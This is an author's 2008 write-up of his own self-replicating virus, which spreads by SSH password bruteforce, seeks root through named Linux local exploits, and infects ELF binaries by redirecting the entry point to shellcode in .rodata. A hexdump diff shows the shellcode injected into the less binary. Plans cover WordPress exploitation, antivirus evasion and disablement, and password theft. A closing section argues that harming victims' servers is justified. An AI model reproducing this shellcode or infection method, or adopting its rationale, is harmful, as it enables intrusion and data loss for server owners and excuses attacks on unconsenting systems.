AltSci Concepts Virus Analysis

by Joel R. Voss aka. Javantea
jvoss@altsci.com
March 6, 2008

Introduction

This is a pretty simple virus, so the lessons learned from analyzing it should carry over to more than just this virus. I tried to write it generically enough to fit any case, so as I analyze it I will compare it to other viruses and to how things on the net work. I'll try to come from a neutral standpoint, because demonizing or glorifying a virus is counterproductive to the task of learning what it is and why it is. I'll keep the philosophy clearly marked in the next-to-last section so that readers can skip over it or skip to it, as they prefer.

Method

Design of Infection Vector

Every virus needs to get onto a computer (host) somehow. In the old days, viruses resided on floppies. These days they are much more often carried by computer networks, the internet being the largest. If you think of floppies and other removable media as a sort of sneakernet, then all viruses need a network. This method of transfer ends up running code on a system that the user usually did not intend to run. In the SSH Bruteforce Virus, I spread the virus using a dictionary password cracker that supports Secure Shell (SSH). This is very simple and uses an open source library for SSH (libssh-0.2). When my virus successfully logs into a remote system, it copies a tar-archived version of itself to the victim. It extracts the archive and executes the payload script. The remote system now has an exact copy of the virus. This is the definition of a replicating virus. At this point, the system is infected and can infect more systems.

How virulent is an SSH dictionary password attack? Not very. Compared to viruses that are in the wild in 2008, an SSH attack would be quite slow and ineffective.

I scanned my /16 (216.127.0.0/16, which is 65,536 addresses) using an Nmap stealth SYN scan, a trivial task. I found 4550 IPs responding on port 22 (SSH). I could not tell whether some of these were machines with multiple IPs, which is common with servers. Future scans will record version and route, and may test TCP variables. This is rather a lot of work, so I don't expect it to be in the next issue.

By comparison, the Storm Worm and Botnet was found on 274,372 of the 2.6 million machines scanned by Microsoft's Windows Malicious Software Removal Tool [1]. A 10% infection rate is extremely high for a virus. The infection vector of drive-by downloading websites is effective because the Internet Explorer browser is so often vulnerable to easily exploitable bugs. Though Microsoft blames this on their (albeit quickly waning) popularity and on users' unwillingness to update regularly, it should be clear to virus researchers that these are serious programming flaws.

In the case of SSH there are very few attack vectors. Having worked tech support for a small web host, I noticed that SSH and CPanel passwords were often dictionary words, which is against best practices. Since users either forget their passwords or write them down if forced to use a good password, dictionary passwords make up perhaps 2% of passwords on these large hosts. The task becomes matching a hostname and username with a dictionary password, which puts the infection rate somewhere near 0.02 * 0.01 * 0.001 = 1:5,000,000. Since the process can be automated, distributed, and possibly anonymized through Tor, this becomes a pretty good rate over time. However, at the infection rate we have for Storm, there is no way that 200k dictionary passwords exist on SSH servers. Even though there are possibly 23M IP addresses [2] running SSH, most of them will resist the attack long enough for it to be detected and blocked. Most larger hosts have automated IDS to block these sorts of attacks, and many smaller hosts can detect them by looking at logs (often accidentally).
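The figures quoted so far can be checked with a few lines of arithmetic. This is only a sketch of the numbers as stated in the article; the 0.01 and 0.001 factors are taken as given, since the text does not break them down, and the variable names are mine.

```python
from fractions import Fraction

# Hosts answering on port 22 in the scanned /16 (4550 of 65,536 addresses).
responding = Fraction(4550, 65536)

# Storm detections reported by the Malicious Software Removal Tool [1].
storm_rate = Fraction(274_372, 2_600_000)

# The article's estimate for one SSH guess succeeding: 2% dictionary
# passwords times two further factors the article does not itemize.
ssh_odds = Fraction(2, 100) * Fraction(1, 100) * Fraction(1, 1000)

print(f"port 22 responders: {float(responding):.2%}")
print(f"Storm infection rate: {float(storm_rate):.2%}")
print(f"SSH guess odds: 1 in {ssh_odds.denominator // ssh_odds.numerator:,}")
```

Using exact fractions avoids floating-point noise in the 1:5,000,000 figure.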

Assuming a flood of new Linux/BSD users and ssh being enabled on each machine and port forwarding or DMZ being activated on the modem (a quite unlikely circumstance), it is possible that a large number of these machines could be infected. Most Linux distros do not turn on SSH without the admin explicitly turning it on. This may change in the future, but should not in large numbers. Also, since home and business users are behind NAT, their SSH should be protected. Viruses like Storm that use a pull method (web browser vulnerability or e-mail social engineering) don't have to worry about NAT.

Much more likely, the SSH Bruteforce Virus would be able to infect current shared servers that allow poor passwords. Large hosts like dreamhost and their smaller competitors would be the main target of this virus.

Getting Administrator Privileges

After the virus has infected a machine, it can run any program as the user whose account it has compromised. It is uncommon for root to be left open on an SSH server, but it is worth a try. Testing sudo and su is also a good idea, since a server may use the same password for root as for a user, or the infected user may have sudo access. Testing sudo might alert an aware admin, but often these logs are overlooked even by better admins. More likely to cause root compromise is a local root vulnerability. Currently many versions of Linux are vulnerable to local root bugs. For example, h00lyshit covers much of 2.6.0-2.6.17, and the new vmsplice vulnerability (jessica_beal_in_my_bed.c) covers most of 2.6.17-2.6.24.3. 2.4 also has a large number of local root vulnerabilities that are well documented and exploitable with simple tools. Simply testing each of these and checking whether it gives a root shell is an easy task.
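From the administrator's side, the version ranges named above can be turned into a quick audit. The following is a minimal sketch, assuming the ranges exactly as quoted in this article (inclusive at both ends, which is my reading) and assuming the release string starts with a dotted version number. The names kernel_tuple, RANGES and named_ranges are hypothetical. A match is only a hint, since distributions often backport fixes without changing the version number.

```python
import re

# Version ranges as quoted in the article; the inclusive bounds are an assumption.
RANGES = {
    "h00lyshit": ((2, 6, 0, 0), (2, 6, 17, 0)),
    "vmsplice": ((2, 6, 17, 0), (2, 6, 24, 3)),
}

def kernel_tuple(release: str) -> tuple:
    """Turn '2.6.24-19-generic' into (2, 6, 24, 0)."""
    match = re.match(r"\d+(?:\.\d+)*", release)
    if match is None:
        raise ValueError(f"no version number in {release!r}")
    parts = [int(p) for p in match.group(0).split(".")]
    # Pad to four components so that tuples compare consistently.
    return tuple(parts + [0] * (4 - len(parts)))[:4]

def named_ranges(release: str) -> list:
    """Return the names of the quoted ranges that contain this release."""
    version = kernel_tuple(release)
    return [name for name, (low, high) in RANGES.items() if low <= version <= high]
```

On a live system the input would typically come from platform.release() in the standard library, for example named_ranges(platform.release()).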

For virus authors, Windows is an easy target for root since the user infected almost always has administrator privileges.

BSD-based operating systems are known for their high security, and there have been only a few local and remote root vulnerabilities in recent history.

Infecting Binaries

Assuming that administrator privileges have been gained, the entire system is left to the attacker. The obvious attack is to install a rootkit. It is common to add a kernel module to hide and give return access to the virus. My virus currently does not infect the kernel, though it is planned for a future version. Currently it infects x86 ELF binaries. This is the most interesting part for virus writers usually because it requires low-level understanding of a computer, usually assembly, executable format, and system internals. It also changes the game of viral infection. A computer that has been properly infected by a virus cannot be uninfected. The hard drive must be formatted or completely scanned offline to ensure that the various infections have not continued the infection of the virus. Since this is an expensive task and involves potentially losing a lot of expensive data, viruses that infect binaries are especially harmful to victims.

Infecting an ELF32

Somewhere in the code, we need the binary to transfer control of the program to our virus. Whether the virus gives the control back or not is up to the virus. In my virus, I give control to the virus at the first opportunity: the entry point. Each ELF32 header has an entry point field which holds the memory address at which the program starts executing. I store this and overwrite it with a pointer to a place in the .rodata section (read-only data) where my shellcode is stored. In .rodata I overwrite existing data so that the executable file size is the same as it was originally. The data that I overwrite is chosen to be the longest run of ASCII in the section. Most of the data in .rodata is never accessed, so this causes no error. If I overwrite data that is accessed, it will almost always be data that is unimportant to the functioning of the process. For example, less, when infected with this virus, shows the shellcode in the bottom line instead of the line number. A person who is running less would possibly notice this, but on many systems the output of less is not carefully examined unless the system is under heavy development. In programs whose output is very rarely checked, such as apache and modprobe, this virus can run completely undetected.

Hexdump Diff:

--- less2.hex   2008-03-17 05:15:12.000000000 -0700
+++ lessPwn3d2.hex      2008-03-17 05:15:34.000000000 -0700
@@ -1,5 +1,5 @@
 0000:0000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 .ELF............
-0000:0010 02 00 03 00 01 00 00 00 a0 93 04 08 34 00 00 00 ........ ...4...
+0000:0010 02 00 03 00 01 00 00 00 60 08 06 08 34 00 00 00 ........`...4...
 0000:0020 a8 b4 01 00 00 00 00 00 34 00 20 00 08 00 28 00 ¨´......4. ...(.
 0000:0030 1b 00 1a 00 06 00 00 00 34 00 00 00 34 80 04 08 ........4...4...
 0000:0040 34 80 04 08 00 01 00 00 00 01 00 00 05 00 00 00 4...............
@@ -6276,20 +6276,20 @@
 0001:8830 79 74 65 20 25 62 42 3f 73 2f 25 73 2e 20 3f 65 yte %bB?s/%s. ?e
 0001:8840 28 45 4e 44 29 20 3a 3f 70 42 25 70 42 5c 25 2e (END) :?pB%pB\%.
 0001:8850 2e 25 74 00 00 00 00 00 00 00 00 00 00 00 00 00 .%t.............
-0001:8860 3f 66 25 66 20 2e 3f 6e 3f 6d 28 25 54 20 25 69 ?f%f .?n?m(%T %i
-0001:8870 20 6f 66 20 25 6d 29 20 2e 2e 3f 6c 74 6c 69 6e  of %m) ..?ltlin
-0001:8880 65 73 20 25 6c 74 2d 25 6c 62 3f 4c 2f 25 4c 2e es %lt-%lb?L/%L.
-0001:8890 20 3a 62 79 74 65 20 25 62 42 3f 73 2f 25 73 2e  :byte %bB?s/%s.
-0001:88a0 20 2e 3f 65 28 45 4e 44 29 20 3f 78 2d 20 4e 65  .?e(END) ?x- Ne
-0001:88b0 78 74 5c 3a 20 25 78 2e 3a 3f 70 42 25 70 42 5c xt\: %x.:?pB%pB\
-0001:88c0 25 2e 2e 25 74 00 00 00 00 00 00 00 00 00 00 00 %..%t...........
-0001:88d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
-0001:88e0 3f 6e 3f 66 25 66 20 2e 3f 6d 28 25 54 20 25 69 ?n?f%f .?m(%T %i
-0001:88f0 20 6f 66 20 25 6d 29 20 2e 2e 3f 65 28 45 4e 44  of %m) ..?e(END
-0001:8900 29 20 3f 78 2d 20 4e 65 78 74 5c 3a 20 25 78 2e ) ?x- Next\: %x.
-0001:8910 3a 3f 70 42 25 70 42 5c 25 3a 62 79 74 65 20 25 :?pB%pB\%:byte %
-0001:8920 62 42 3f 73 2f 25 73 2e 2e 2e 25 74 00 00 00 00 bB?s/%s...%t....
-0001:8930 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+0001:8860 31 c0 b0 02 cd 80 31 db 39 d8 75 62 31 c0 31 db 1À°.Í.1Û9Øub1À1Û
+0001:8870 99 50 6a 01 6a 02 89 e1 fe c3 b0 66 cd 80 89 c6 .Pj.j..áþÃ°fÍ..Æ
+0001:8880 fe c6 66 52 b2 7f fe ce 66 52 66 68 05 39 b2 02 þÆfR².þÎfRfh.9².
+0001:8890 66 52 89 e1 6a 10 51 56 89 e1 b3 03 b0 66 cd 80 fR.áj.QV.á³.°fÍ.
+0001:88a0 99 56 8b 1c 24 31 c9 b1 03 fe c9 b0 3f cd 80 75 .V..$1É±.þÉ°?Í.u
+0001:88b0 f8 52 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 52 53 øRh//shh/bin.ãRS
+0001:88c0 89 e1 b0 0b cd 80 b3 02 31 c0 b0 01 cd 80 90 90 .á°.Í.³.1À°.Í...
+0001:88d0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
+0001:88e0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
+0001:88f0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
+0001:8900 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
+0001:8910 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
+0001:8920 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
+0001:8930 e9 6b 8a fe ff 00 00 00 00 00 00 00 00 00 00 00 ék.þÿ...........
 0001:8940 3f 6e 3f 66 25 66 20 2e 3f 6d 28 25 54 20 25 69 ?n?f%f .?m(%T %i
 0001:8950 20 6f 66 20 25 6d 29 20 2e 2e 3f 65 28 45 4e 44  of %m) ..?e(END
 0001:8960 29 20 3f 78 2d 20 4e 65 78 74 5c 3a 20 25 78 2e ) ?x- Next\: %x.

As you can see from the above, the diff is very compact and touches only the two active items: the entry point and the .rodata overwrite. In the ELF header, the original entry point appears in the hex dump as the little-endian bytes a0 93 04 08 = 0x080493a0. We modify this to 60 08 06 08 = 0x08060860. Then down in .rodata at file offset 0x18860, we modify the read-only data below to become our shellcode.
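The addresses in the diff can be cross-checked by hand or with a short script. The sketch below uses only bytes visible in the hexdump above. It assumes that the file is mapped so that file offset 0x34 lands at 0x08048034 (as the PT_PHDR entry in the header rows suggests) and that .rodata sits in that same mapping. The variable names are mine.

```python
import struct

# Row 0x10 of each hexdump; e_entry lives at file offset 0x18 (index 8 here).
clean_row = bytes.fromhex("02000300 01000000 a0930408 34000000")
infected_row = bytes.fromhex("02000300 01000000 60080608 34000000")
clean_entry, = struct.unpack_from("<I", clean_row, 8)
infected_entry, = struct.unpack_from("<I", infected_row, 8)

# Assumed mapping: file offset 0x34 is loaded at virtual address 0x08048034.
LOAD_BIAS = 0x08048034 - 0x34

# The overwritten .rodata region starts at file offset 0x18860.
stub_vaddr = 0x18860 + LOAD_BIAS

# The last instruction of the stub, at file offset 0x18930: e9 6b 8a fe ff.
# e9 is a near jmp with a signed 32-bit displacement that is measured from
# the end of the 5-byte instruction.
rel32, = struct.unpack("<i", bytes.fromhex("6b8afeff"))
jmp_target = (0x18930 + LOAD_BIAS) + 5 + rel32

print(hex(clean_entry), hex(infected_entry), hex(stub_vaddr), hex(jmp_target))
```

Under those assumptions the new entry point is exactly the start of the overwritten region, and the trailing jmp lands back on the original entry point, which is how the infected program still starts normally.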


?f%f .?n?m(%T %i of %m) ..?ltlines %lt-%lb?L/%L. :byte %bB?s/%s. .?e(END) ?x- Next\: %x.:?pB%pB\%..%t

If you're familiar with shellcode, it should be obvious that 31c0 b002 cd80... is shellcode. Those 6 bytes are the fork syscall in Linux. The virus is designed to run alongside the program that it has infected so that a user is not aware of the infection. By forking, the virus creates a second process with the same name as the original program. The fork is so quick that the program starts up without any delay. Using a hack such as scream1 (included in the virus source code), it is possible to change the executable's name to any name, so that the user is entirely unaware of the virus if they check using ps aux.
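For anyone inspecting a suspect binary, those six bytes make a crude signature. The following is a minimal sketch of a byte-pattern search, not a real virus definition: the names FORK_STUB and find_all are hypothetical, the pattern could also appear in legitimate code or data, and it would miss any variant that encodes the fork differently.

```python
# xor %eax,%eax ; mov $2,%al ; int $0x80  (the fork stub from the hexdump)
FORK_STUB = bytes.fromhex("31c0b002cd80")

def find_all(data: bytes, needle: bytes = FORK_STUB) -> list:
    """Return every file offset at which needle occurs in data."""
    offsets = []
    pos = data.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(needle, pos + 1)
    return offsets
```

Run against the infected copy of less shown above, a hit at offset 0x18860 would be the expected result, since that is where the diff places the stub.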

Looking through the .rodata, a more advanced version of the virus could target read-only strings that are almost never displayed by the program. There is quite a lot of unused data in .rodata. Programmers like myself that are very verbose in their error responses have thousands of bytes of unused read-only data. The program's usage is a common long string that can be overwritten without affecting normal usage (though it would quickly alert a suspicious user who is checking the usage).

Several problems could occur when .rodata is overwritten. In the case of less, we overwrite patterns such as %i. It is possible to cause a format string segfault, though quite unlikely. Also, if the shellcode does not contain enough null terminators, a strcpy or a sprintf could overflow a buffer, overwriting the saved eip with garbage. I have not found an example of that, but it is reasonable to expect that such a problem could occur. This is a rather sticky issue if it ever occurs, but it can be easily fixed by trial and error. Adding nulls, removing percents, and so forth is actually trivial:

; add a null without changing the effect of the code
add $0, %eax
; putting a % into %al without adding a % to the code.
mov $36, %al
add $1, %al

The virus selects the position of the shellcode based on the length of strings in .rodata. It can also pick a random position if told to. This makes it almost impossible to guess the position of the shellcode. If you calculate the candidate positions in .rodata using the same code as the virus and then check every one of them for shellcode, you will be able to detect it. Currently there is no way of getting to the shellcode other than the entry address, so calculating which section the entry address points to could detect the virus. It is possible that a future version of the virus could point to a nop section in .text which is overwritten with a jump to .rodata. This would make the detection process more difficult but still possible. If a very advanced version of the virus made a non-deterministic piece of code in .text that ended up pointing to .rodata, it could still be detected, since normal programs are much saner about their execution. If a virus modified the main code to act very much like a normal program, it would still need to either act unprogram-like or jump to .rodata (both of which give it away). A virus that puts shellcode only in .text and not in .rodata would need to overwrite unused code. Finding code that is rarely used is a fairly difficult task. The Bukowski Virus replaces sections of nops used for alignment with the virus. This limits the virus size to a fraction of the number of nops in the program (usually very small).
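The entry-address check described above is simple to sketch for a defender. The code below reads the ELF32 header and section headers and reports whether the entry point falls in a section marked as executable. It assumes a little-endian ELF32 file with an intact section header table, and the function name is hypothetical. A binary infected as described in this article would return False, because its entry point lies in .rodata.

```python
import struct

SHF_EXECINSTR = 0x4  # section flag: contains executable instructions

def entry_section_is_executable(elf: bytes) -> bool:
    """True if e_entry lies inside a section flagged SHF_EXECINSTR."""
    if elf[:4] != b"\x7fELF" or elf[4] != 1 or elf[5] != 1:
        raise ValueError("not a little-endian ELF32 file")
    e_entry, = struct.unpack_from("<I", elf, 0x18)
    e_shoff, = struct.unpack_from("<I", elf, 0x20)
    e_shentsize, e_shnum = struct.unpack_from("<HH", elf, 0x2E)
    for index in range(e_shnum):
        # First six Elf32_Shdr fields: name, type, flags, addr, offset, size.
        _name, _type, sh_flags, sh_addr, _offset, sh_size = struct.unpack_from(
            "<6I", elf, e_shoff + index * e_shentsize
        )
        if sh_addr == 0:
            continue  # section is not mapped into memory
        if sh_addr <= e_entry < sh_addr + sh_size:
            return bool(sh_flags & SHF_EXECINSTR)
    return False  # entry point is not inside any mapped section
```

A typical call would pass the whole file, for example entry_section_is_executable(open(path, "rb").read()). A stripped section table would defeat this check, so a negative result is a reason to look closer rather than proof of infection.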

In the future, if a virus definition is created, this article will link to it. I will also write an article describing the implications of the anti-virus with a link.

Future

In the above, I have explained several methods of making the virus all that it can be. I have discussed overall limitations to viruses that act like this. Here I will not repeat those ideas, but list those projects that I am working on which can be developed in the short term. When 1.1 is released, the virus will be renamed to AltSci Modular Virus since it will target multiple vulnerabilities on many platforms.

WordPress

I am currently working on a WordPress XMLRPC exploit add-on to this framework. This would make the virus use two different methods of infection: SSH and Web. WordPress XMLRPC is a very different infection vector because a single server could have hundreds of domains that are difficult to guess. A different method of finding WordPress sites is in development: using search engines, a spider, and automated link portals such as digg and del.icio.us. The virus would download a random list of WordPress sites and get their version numbers. If the version is exploitable, the virus will run the exploit. This will allow the virus to upload the tar archive and run the executable in the same way as the SSH infection vector. The list of sites can be accumulated and used for other purposes. For example, if another piece of software is found to be vulnerable to a different attack, the virus will have a list of vulnerable sites, so once the patch is installed, it can immediately attack those vulnerable sites. Version 1.1 will include a basic WordPress XMLRPC attack.

Shellcode Writing in C

I am currently working on a project to use the -fPIC flag to compile C code into position independent code so that it can be executed as shellcode. There are bugs that are hindering this project, but I suspect that it will be ready for the modular virus in version 1.2 to be released Q2 2008.

Polymorphic Tar Archive and Binaries

Since the archive is a point at which an anti-virus could attempt to signature the virus, modifying its contents so that the archive cannot be identified is a project for the virus. It would not be difficult to trick an anti-virus that looked just for filenames or file checksums, but one that looks for core pieces of the virus binary may be more difficult to evade. If it is found that a virus definition can be avoided by modifying the archive and/or binaries, a release in the future will contain this simple code. The obvious reason why this might work is that if an anti-virus program untarred every compressed archive that was copied, it would slow down the server immensely, so anti-viruses must be more frugal with resources.

Infecting ClamAV, Tripwire, SCP, and SFTP

Viruses are constantly competing with their nemesis anti-virus programs. The AltSci Modular Virus would benefit greatly by checking for anti-virus when it runs and disabling it if possible. Anti-virus programs that use kernel modules would be able to detect the virus infection as soon as it attempts to overwrite an executable or get root. Luckily Linux and BSD anti-viruses do not use this method of detection. If an anti-virus is found, it could be modified specifically to not detect the virus. SCP and SFTP are programs that transfer files between a system and an authenticated system. By infecting these programs, the virus can steal passwords and infect remote machines. This is actually easier than it sounds. As each of these programs is manually infected, the module to infect them will be added to the virus.

Graphical User Interface

Since the intention is to distribute this virus as widely as possible, I plan to write a Gtk+2 GUI for it so that end users can easily run the program. From there, I can port the virus to Win32 as well as other operating systems so that more users can use it. Since the GUI will be run on intentional users' machines, it must be clear that the user's binaries will not be infected. The user will be running the payload that bruteforces SSH, but will not be harming their own system. A GUI will be useful since command line control of a large number of servers via SSH is currently very manual. The user currently runs a client that connects to the virus and can connect to any of the infected machines currently connected to the virus. The user gets a shell and can run the same client program to connect to that machine's virus and so on. With a GUI, a simple tab-based interface very familiar to users can be used to control all of the machines connected in a tree. The GUI will be added in version 1.3 in Q3 2008.

Philosophy

As I explained in the introduction, I wish to discuss the philosophy of this virus in this section. If you are not interested, feel free to skip to the next section. I wrote this virus with several motivations in mind. First, the virus is an effective method of gaining control of vulnerable machines which are not under a person's control. Whether this is used for malicious or testing purposes, I am happy that code I write is used. Whoever has good passwords should only be positively affected by this virus. Secondly, I wished to publicize the cause of good passwords on servers since blackhats are currently using the SSH Bruteforce method to attack servers. Thirdly, I wished to write a malicious piece of code to challenge laws that prohibit the distribution of malicious tools. The German Law prohibiting the distribution of "hacking tools" is an affront to the entire security community, white hat or not.

Hacking tools are designed to be useful to a purpose. Whether the purpose is malicious or not depends entirely on the usage. Even a program with no dual-use purpose, such as this virus, could be immensely helpful in publicizing the vulnerabilities that it exploits. If the end result of this program is five servers destroyed by a script kiddie, it will have served its purpose perfectly. Though I don't condone using this virus against unwitting victims, neither will I condemn its use. If the virus is not used, it cannot serve its purpose. I have built a network of virtual machines on my servers and am currently preparing a fun and quiet wargame with this virus on the public internet involving only my own machines. In this way I can learn how this virus works almost in the wild without harming any systems.

Hacking tools must be ever improved if the war against harmful network actors is to be won. This virus is an advanced tool against vulnerable machines whether they are harmful or not. Since harmful machines can often be detected and traced, they can be attacked continually with hacking tools such as this virus without doing noticeable harm to any useful network resources. This type of offense as a form of defense is currently condemned by most security experts (including myself), but that may change very quickly in the near future. Many previous offensive hacking tools have become defensive hacking tools in a very short time span. For example, nmap, once an offensive tool, has now become a standard white hat tool. Honeypots were once research-only and offensive tools, but have now become accepted as defensive tools. Security researchers are already using bruteforce for pen testing and soon may be using it in a similar fashion to nmap or a honeypot.

The philosophy of harm which I have developed has a paper of its own (to be published at a later date), so I wish to only briefly discuss the implications of such a philosophy and why the virus fits the mold properly. Harm is by definition negative and bad. Without a clear definition of what negative and bad are, we cannot define harm properly. If we assume that destruction of property, improper usage of private resources, and cost of admin time are negative and harmful, then the virus infecting vulnerable machines not owned by the infector is harmful. It is normal in society that harm is to be avoided; however, I make a case that harm has positive effects in certain circumstances. In the case of a virus infecting machines with dictionary passwords, the machine is vulnerable to any brute force attack. The harm is partially done when the dictionary password is chosen, and partially when the virus infects the machine. The outcome of the infection may be a hard drive format or a simple administrator intervention (if the admin is confident that the machine can be uninfected). These outcomes cost the administrator time and possibly data, which can be considered the cost of the harm. The administrator is likely to change password policy on this machine as well as any other machine that can be fixed with this simple change. With this change, users will become more accustomed to using strong passwords. The harm has taught more than one person and changed more than one machine toward better practices. In this way, I can see that harm actually improves the security of the network over time. The only way for bad passwords to be fixed without administrator action is for a virus to infect the machine. This becomes an argument of means-ends philosophy, which is not entirely clear to condemn. We cannot automatically say that harm must be avoided at all costs, since the alternative is likely a much worse problem.
Harm cannot be judged by its negative consequences alone but also the benefit that is derived. Since administrators are quite lazy, they are unlikely to upgrade or use best practices if there is no consequence. Giving administrators no incentive to upgrade or to use best practices is a bad idea. Thus harm is the only way to ensure that administrators will follow best practices. I admit that the philosophy of harm does not always make as much sense as in this example, but harm cannot always be avoided and thus must be handled. Security practices are designed to minimize harm, thus giving us a proper recourse to avoid harm.

Conclusion

I have discussed the method that this virus uses to achieve network infection, administrator privileges, binary infection, and future projects which I plan to implement. Though it is a fairly weak attack, it is useful nonetheless. It certainly advertises the use of best practices when it comes to passwords, user and administrator access separation, and intrusion detection. As each side in the war for network resources increases their weaponry's effectiveness and scope, tools like this must be written to keep both sides in check. I made this tool open source to ensure that people can learn, trust, improve and fix their code using this code in any manner they wish. I am charging a nominal price for it because I feel that my work should benefit me in the measure that it is used. I offer free support to anyone who purchases the product. I wish all actors in this process good luck and good game.

If you are interested in developing, analyzing, publicizing, or discussing the AltSci Concepts Virus, please e-mail Javantea.
